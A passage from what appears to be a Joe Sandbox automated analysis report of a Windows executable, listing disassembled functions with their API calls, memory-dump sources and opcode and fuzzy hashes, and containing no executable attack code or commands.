                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                • String ID:
                • API String ID: 2155170405-0
                • Opcode ID: 7bd6fbbf5ba6f6677b3253943a599e90208f3dae79d908d021c3adcbf26d4254
                • Instruction ID: 2f3fb7263365d36fdf72320f0d6d8119d640eec10a6b0251311853735c0fc5e8
                • Opcode Fuzzy Hash: 7bd6fbbf5ba6f6677b3253943a599e90208f3dae79d908d021c3adcbf26d4254
                • Instruction Fuzzy Hash: 1E51C572900319ABCB50EF69CC819BE77BCEF41314B15416AE624E72E1E7309E44CB72
                Function 00C78040 Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C78047
                • ??0Channel@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@01@PAX@Z.RWSNDPQSKZ(?,?,?,00000008), ref: 00C78074
                • InitializeCriticalSection.KERNEL32(?,?,?,?,00000008), ref: 00C78088
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ChannelChannel@ssb_ipc@@CriticalH_prolog3InitializeListener@01@Mode@1@Section
                • String ID:
                • API String ID: 3297177522-0
                • Opcode ID: 895d56c6b0b477f5191eca19187e2be32fc7544d3ebd2a86073beb7c633a618b
                • Instruction ID: cdee40bdda7f1d9e539dc756e03b9953e4221665f19015d2ef6e9dcfd8e9e305
                • Opcode Fuzzy Hash: 895d56c6b0b477f5191eca19187e2be32fc7544d3ebd2a86073beb7c633a618b
                • Instruction Fuzzy Hash: DBF0A97490070AAECB21DF94C5409AEBBB0FF00704F04811CA8499B311CBB09E49EB61
                Function 00D00155 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00CED4E1), ref: 00D0017F
                Strings
                • GetSystemTimePreciseAsFileTime, xrefs: 00D00165
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@
                • String ID: GetSystemTimePreciseAsFileTime
                • API String ID: 3914272143-595813830
                • Opcode ID: 4b1d6414eb2a014e821128ea236b4f9db8ce91aec6f28f343ded4d0669569ad1
                • Instruction ID: d549265f3c80bb800f22c0def8082ad8cf7a52d6ccf75bd081df3b2edc350f8d
                • Opcode Fuzzy Hash: 4b1d6414eb2a014e821128ea236b4f9db8ce91aec6f28f343ded4d0669569ad1
                • Instruction Fuzzy Hash: A2E0C23278033877C23126847C06FEABE15DB50BB5F040062FA0896280DA71091A86F5
                Function 00CBE0BE Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,9FB8111D), ref: 00CBE0DD
                • FindClose.KERNEL32(00000000), ref: 00CBE0E9
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: dbd7e2a485fa2518c939f77dfd20b818e9895bfa44d33d09c25dd58bd23d2529
                • Instruction ID: ab258b08d2391e9008fda8b3eb15d8d87eec0b5518b9e47c3a546c5199aea2e3
                • Opcode Fuzzy Hash: dbd7e2a485fa2518c939f77dfd20b818e9895bfa44d33d09c25dd58bd23d2529
                • Instruction Fuzzy Hash: EEF0E5701147448BC320EB38DC4AA9BB3DAEBC8324F408B19A4A9C62D0EF38D506C6D2
                Function 00D00116 Relevance: 3.0, APIs: 2, Instructions: 24COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,-00000050,?,?,?,00CFD7E1,?,20001004,00000000,00000002,?,?,00CFCDCC,?,?), ref: 00D00135
                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00CFD7E1,?,20001004,00000000,00000002,?,?,00CFCDCC), ref: 00D0014A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@InfoLocaleState@Unlock@
                • String ID:
                • API String ID: 2747073063-0
                • Opcode ID: a0796e5e469711b8f99813da70ad1238ca6afa814a79988ad1ffb2511bc4d68b
                • Instruction ID: 0e3b5486efed5345fc90b7d4193ad742c1e925233c5c26372c14eac46f94fbea
                • Opcode Fuzzy Hash: a0796e5e469711b8f99813da70ad1238ca6afa814a79988ad1ffb2511bc4d68b
                • Instruction Fuzzy Hash: CAE04F3250032CBBCF126F60DC04BEE7F2AEF44761F044024FD09A6260CB329962ABB5
                Function 00D00967 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D00962,?,?,00000008,?,?,00D0D105,00000000), ref: 00D00B94
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 2c23b94f38b14dc9e27e480148db5b99fcd984298845085132c4a85146853067
                • Instruction ID: 1925f872d03cb7e9de9d06afe36ff37e9b570c087e2702c5686712cd1f726099
                • Opcode Fuzzy Hash: 2c23b94f38b14dc9e27e480148db5b99fcd984298845085132c4a85146853067
                • Instruction Fuzzy Hash: 76B11731610609AFD718CF28C48ABA57FA0FF45365F298658E89ACF2E1C335E981CB50
                Function 00C64800 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                Download Yara Rule
                APIs
                • ?cmm_memset_s@Cmm@@YAHPAXIHI@Z.RWSNDPQSKZ(00000000,?,00000000,?,?,?,?,?,?), ref: 00C66559
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ?cmm_memset_s@Cmm@@
                • String ID:
                • API String ID: 124908343-0
                • Opcode ID: 4430dc4690a800843cd062b240c2ddf9581fa443f1696da07db198a2fa7266fc
                • Instruction ID: a4309a873adc01eda8e84eb8be078da750ef52d3d312b1719569c6e7aaad8fbb
                • Opcode Fuzzy Hash: 4430dc4690a800843cd062b240c2ddf9581fa443f1696da07db198a2fa7266fc
                • Instruction Fuzzy Hash: D5512B71A00916DFDB39CE69E4E167DBB72EB41300F60426DD1035B285CB31EE82C785
                Function 00D067D0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3104fbceca50b35d151119d77d90ee325df399c17cce6e64cc554bc162a1d52
                • Instruction ID: a5152391bb945010568cac61689cae7b2dba0b2763c863e6eb9f9438fa47f2c9
                • Opcode Fuzzy Hash: a3104fbceca50b35d151119d77d90ee325df399c17cce6e64cc554bc162a1d52
                • Instruction Fuzzy Hash: 3031D772900219AFDB24DF69CC89EBBB7B9EF84310F148568F90997280EA30DD54CB70
                Function 00CAC9F0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAC9F7
                  • Part of subcall function 00CAC031: __EH_prolog3.LIBCMT ref: 00CAC038
                  • Part of subcall function 00CAC031: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000001,?,?,?), ref: 00CAC0EE
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3$CompletionCreatePort
                • String ID:
                • API String ID: 2385030332-0
                • Opcode ID: 616d92cdc930c45af1317f1e196b59961b277438a9d6c4aee956e1c7b58f80e0
                • Instruction ID: daf4ce95fa77dccf20e535627657bde1e099ee4d51d61dfe3b498eb2cda86d63
                • Opcode Fuzzy Hash: 616d92cdc930c45af1317f1e196b59961b277438a9d6c4aee956e1c7b58f80e0
                • Instruction Fuzzy Hash: 25E04F71A04289EFDF05AF64D8026AD7BA1FF04750F10841DFA654E2A1DBF24D60EB55
                Function 00CACA40 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CACA47
                  • Part of subcall function 00CAC13A: __EH_prolog3.LIBCMT ref: 00CAC141
                  • Part of subcall function 00CAC13A: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00CAC1DC
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3$CompletionCreatePort
                • String ID:
                • API String ID: 2385030332-0
                • Opcode ID: 4608e1862c8254c2de847c03b28e4c3a848021ada51e5db4edf723b557560f23
                • Instruction ID: b69d374313fe1e676b486b8c807977baaa35ef920c3a54c2b4c29543320cc76e
                • Opcode Fuzzy Hash: 4608e1862c8254c2de847c03b28e4c3a848021ada51e5db4edf723b557560f23
                • Instruction Fuzzy Hash: A4E04F71A04285EFDB05AF64880266D7BB0EB00714F10801DFA654E2A1DBF14950E754
                Function 00CEC0C3 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID: 0
                • API String ID: 0-4108050209
                • Opcode ID: 14039a56e3f464b9ca6efe7f98f93a9b9add74b3526c9c49eb1dd60acfb9e597
                • Instruction ID: 33ef0f2d97dd58ff285034e8c44cdc279152e8fb267a5868cc07c339dd95ac94
                • Opcode Fuzzy Hash: 14039a56e3f464b9ca6efe7f98f93a9b9add74b3526c9c49eb1dd60acfb9e597
                • Instruction Fuzzy Hash: B7617A716003C85BDB3CAAAB88C2BBE73A5EF45740F14442EE562DB282D7259F43E745
                Function 00CDC00B Relevance: 1.3, APIs: 1, Instructions: 51memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00CE4DFA: EnterCriticalSection.KERNEL32(00DFECA8,00DFFC98,00DFFC8C,?,00C62BE7,00DFFC8C), ref: 00CE4E05
                  • Part of subcall function 00CE4DFA: LeaveCriticalSection.KERNEL32(00DFECA8,?,00C62BE7,00DFFC8C), ref: 00CE4E42
                • GetProcessHeap.KERNEL32(?,00000000,00CDD955,00000004,00CDD727,00DFFBA8,?,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDC037
                  • Part of subcall function 00CE4DB0: EnterCriticalSection.KERNEL32(00DFECA8,00DFFC8C,?,00C62C03,00DFFC8C), ref: 00CE4DBA
                  • Part of subcall function 00CE4DB0: LeaveCriticalSection.KERNEL32(00DFECA8,?,00C62C03,00DFFC8C), ref: 00CE4DED
                  • Part of subcall function 00CE4DB0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00DFECA0,?,00DFFC8C), ref: 00CE4E5E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeave$Cmm@@HeapProcessState@Unlock@
                • String ID:
                • API String ID: 1941490770-0
                • Opcode ID: 8a1ad3d26bc49fe71abf49a0ce80ec21717a65aa2ea42e1043040072e0b13200
                • Instruction ID: 30f9303ede0dcaf771bb49b3a8dcd321e66c2346a14892a8115329c9deb70c0a
                • Opcode Fuzzy Hash: 8a1ad3d26bc49fe71abf49a0ce80ec21717a65aa2ea42e1043040072e0b13200
                • Instruction Fuzzy Hash: 58113D7254036D8BC7259F29FCC677937A0AF05325F15812AEA14D63A1CF745586CB38
                Function 00CF6A70 Relevance: .4, Instructions: 450COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 93c4eb08ff03272290253423f96e863541ab86aa452a56fdacb39418a08be059
                • Instruction ID: 76c54ae708b38692aee69deac34c74c27151920154b05c30b34d4e6cb3416ee5
                • Opcode Fuzzy Hash: 93c4eb08ff03272290253423f96e863541ab86aa452a56fdacb39418a08be059
                • Instruction Fuzzy Hash: F7F13F75E002199FDF54CFA9C9806AEFBB1FF48314F258269D929A7344D731AE01CB91
                Function 00CF4AA8 Relevance: .2, Instructions: 159COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1b69ddb478c7702cd525d6958550f824896bff9b86cd3e350a4d08e5407495ff
                • Instruction ID: 5578da9ac28dbca99a0b4441b5ad9527e466ae43ad6bb4cfeb0cb67a34c715d0
                • Opcode Fuzzy Hash: 1b69ddb478c7702cd525d6958550f824896bff9b86cd3e350a4d08e5407495ff
                • Instruction Fuzzy Hash: AE518171E00119AFDF48CF99C950BBEBBB2EF88300F198099E515AB241C7349E51DB91
                Function 00D0C184 Relevance: .1, Instructions: 104COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8b36ca0d27a7b92aa52be73a2a53e49966d53c0985e2b435bb7fc538b1c0b031
                • Instruction ID: 320694ca76a11e568197dfdca1222e0db4a3fb913999431b5bafdcbe7efbacb1
                • Opcode Fuzzy Hash: 8b36ca0d27a7b92aa52be73a2a53e49966d53c0985e2b435bb7fc538b1c0b031
                • Instruction Fuzzy Hash: D621B373F205394B7B0CC57E8C522BDB6E1C68C601745823AF8A6EA2C1D968D917E2E4
                Function 00D0C064 Relevance: .1, Instructions: 81COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
